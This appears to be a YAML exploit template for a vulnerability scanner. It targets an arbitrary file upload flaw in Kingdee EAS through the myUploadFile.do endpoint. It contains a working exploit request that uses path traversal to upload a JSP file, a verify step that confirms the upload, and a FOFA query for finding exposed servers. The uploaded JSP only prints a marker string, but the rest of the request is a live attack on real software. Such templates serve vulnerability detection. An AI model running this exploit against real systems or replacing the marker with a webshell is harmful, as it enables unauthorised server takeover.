product: 金碟EAS
vName: 金碟EAS myUploadFile.do接口任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 金碟EAS myUploadFile.do接口处存在任意文件上传漏洞，攻击者可以通过构造特殊请求包上传恶意后门文件，从而获取服务器权限。
version: ''
note: ''
search:
  FOFA: app=”Kingdee-EAS”
protocol: http
link: https://download.csdn.net/blog/column/12593339/136449491
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /easportal/buffalo/%2e%2e/cm/myUploadFile.do
      file:
        myFile:
          - 52e039302a62d077.jsp
          - <%out.println("95cc64dd2825f9df13ec4ad683ecf339");%>
          - text/html
    verify:
      path: /easportal/buffalo/../52e039302a62d077.jsp
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and